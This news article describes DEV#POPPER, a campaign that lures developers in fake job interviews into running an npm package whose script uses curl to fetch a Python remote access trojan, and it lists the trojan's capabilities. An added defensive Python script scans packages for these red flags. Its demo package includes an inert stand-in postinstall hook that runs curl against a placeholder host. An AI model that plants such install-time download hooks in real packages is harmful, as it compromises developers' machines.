Developers Tricked In Fake Job Interviews To Download Malware

Cybersecurity company Securonix has discovered a new ongoing social engineering attack campaign that targets software developers with bogus npm packages on the pretext of fake job interviews and tricks them into downloading a Python-based remote access trojan (RAT).

Based on the observed tactics, the Securonix Threat Research Team, which tracks the activity as “DEV#POPPER,” has tentatively linked the campaign to North Korean threat actors.

“During these fraudulent interviews, the developers are often asked to perform tasks that involve downloading and running software from sources that appear legitimate, such as GitHub. The software contained a malicious Node JS payload that, once executed, compromised the developer’s system,” said security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov in a blog post.

The ultimate aim of the threat actor is to deceive targets into running malicious software that collects system information and gives the attacker remote access to the host.

In the first stage, the interviewer (the attacker) sends the interviewee (the developer) a link to download a zip archive from GitHub, presented as a coding task for a software developer position. The archive contains a legitimate-looking Node Package Manager (npm) package with a README.md and Frontend and Backend directories.

Once the developer runs the npm package, an obfuscated JavaScript file (“imageDetails.js”) is executed by the Node.js process (node.exe). In this first stage the script’s only job is to invoke ‘curl’ to download an additional archive (“p.zi”) from an external server.

Inside that archive is the next-stage payload, a Python file named “.npl” that functions as a RAT. Because the file name begins with a dot, it is hidden by default on Linux and macOS and in file managers configured to hide dotfiles, so whether the developer ever sees it depends on their operating system settings.

Once the RAT is active on the victim’s system, it collects system and network information and sends it to the command-and-control (C2) server: OS type, hostname, OS release and version, the username of the logged-in user, and a unique device identifier (uuid) generated by hashing the MAC address and username.

According to Securonix analysts, the RAT supports the following capabilities:

  • Networking and session creation for persistent connections to the C2 server.
  • File system functions to traverse directories, filter files by extension and by directories to exclude, and search for and steal specific files or data.
  • Remote command execution that runs system shell commands and scripts on the infected host.
  • Direct FTP exfiltration of data from user directories such as Documents and Downloads.
  • Clipboard and keystroke logging, with the ability to monitor and exfiltrate clipboard contents and keystrokes.
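As an added example that is not part of Securonix’s report or this article, the Python script below triages an unpacked interview-task package for the red flags described above: JavaScript that loads child_process and shells out to curl, dot-prefixed (hidden) files, Python source hiding under a non-.py name, and npm lifecycle scripts that run code at install time. The sample package it builds is constructed for the demo; the postinstall hook, the example.invalid URL and the file contents are assumptions, and both stages are folded into one directory so the scan runs offline.

```python
"""Triage an unpacked npm package for DEV#POPPER-style red flags.
Added example, not Securonix's tooling; the sample tree it writes is
constructed for the demo and its names are not real indicators."""
import json
import re
import tempfile
from pathlib import Path

# JavaScript that loads child_process and mentions curl in the same file
CHILD_PROCESS_RE = re.compile(r"['\"]child_process['\"]")
CURL_RE = re.compile(r"\bcurl\b")
# first bytes that look like Python source
PY_SNIFF_RE = re.compile(r"^(?:#!.*python|(?:import|from)\s+\w)", re.M)
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
BENIGN_DOTFILES = {".gitignore", ".npmignore", ".editorconfig", ".prettierrc"}
JS_SUFFIXES = {".js", ".mjs", ".cjs"}
# extensions whose contents are not sniffed for disguised Python
DECLARED_SUFFIXES = JS_SUFFIXES | {".py", ".ts", ".json", ".md", ".txt", ".yml", ".yaml"}


def triage_package(root):
    """Return a list of (finding, detail) tuples for every file under root."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        if path.name.startswith(".") and path.name not in BENIGN_DOTFILES:
            findings.append(("hidden_file", rel))
        if path.suffix in JS_SUFFIXES and CHILD_PROCESS_RE.search(text) and CURL_RE.search(text):
            findings.append(("js_spawns_curl", rel))
        # Path(".npl").suffix is "", so a dot-prefixed payload lands here too
        if path.suffix not in DECLARED_SUFFIXES and PY_SNIFF_RE.search(text[:512]):
            findings.append(("python_in_disguise", rel))
        if path.name == "package.json":
            try:
                scripts = json.loads(text).get("scripts", {})
            except json.JSONDecodeError:
                scripts = {}
            for hook in LIFECYCLE_HOOKS:
                if hook in scripts:
                    findings.append(("lifecycle_script", f"{rel}:{hook}={scripts[hook]}"))
    return findings


def build_sample_package():
    """Write a constructed lookalike of the layout the article describes
    (README.md, Frontend/, Backend/) to a temp dir and return its path.
    The postinstall hook and the URL are assumptions made for the demo."""
    root = Path(tempfile.mkdtemp(prefix="devpopper_demo_"))
    (root / "Frontend").mkdir()
    (root / "Backend").mkdir()
    (root / "README.md").write_text("# Take-home task\nRun npm install, then npm start.\n")
    (root / "package.json").write_text(json.dumps({
        "name": "interview-task", "version": "1.0.0",
        "scripts": {"start": "node Frontend/index.js",
                    "postinstall": "node Backend/imageDetails.js"},
    }))
    (root / "Frontend" / "index.js").write_text("console.log('hello from the frontend');\n")
    # stage-one downloader stand-in, with the obfuscation stripped so the shape is visible
    (root / "Backend" / "imageDetails.js").write_text(
        'const { execSync } = require("child_process");\n'
        'execSync("curl -s -o p.zi https://cdn.example.invalid/p.zi");\n')
    # stage-two RAT stand-in: Python source under a dot-prefixed, non-.py name
    (root / "Backend" / ".npl").write_text(
        "import socket\nimport platform\n# constructed stand-in, no real payload\n")
    return root


if __name__ == "__main__":
    for kind, detail in triage_package(build_sample_package()):
        print(f"{kind:20} {detail}")
```

Run it against the directory an interview task was unpacked into; a hit on any of the four findings is reason to stop and inspect the code before running npm install, since a lifecycle script executes before anything in the README is ever read.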

“When it comes to attacks which originate through social engineering, it’s critical to maintain a security-focused mindset, especially during intense and stressful situations like job interviews,” the researchers added.

“The attackers behind the DEV#POPPER campaigns abuse this, knowing that the person on the other end is in a highly distracted and much more vulnerable state.”

Securonix recommends people remain extra vigilant, as fake job opportunities are often used as bait to infect people with malware.

For those unaware, in late November 2023, Palo Alto Networks Unit 42 researchers discovered two separate campaigns targeting job-seeking activities linked to North Korean state-sponsored threat actors.

In the first campaign, “Contagious Interview,” threat actors posed as employers to lure software developers into installing malware through an interview process that created the potential for various types of theft.

On the other hand, the second campaign, “Wagemole,” sought unauthorized employment with organizations based in the U.S. and other parts of the world, with potential for both financial gain and espionage.

Kavita Iyer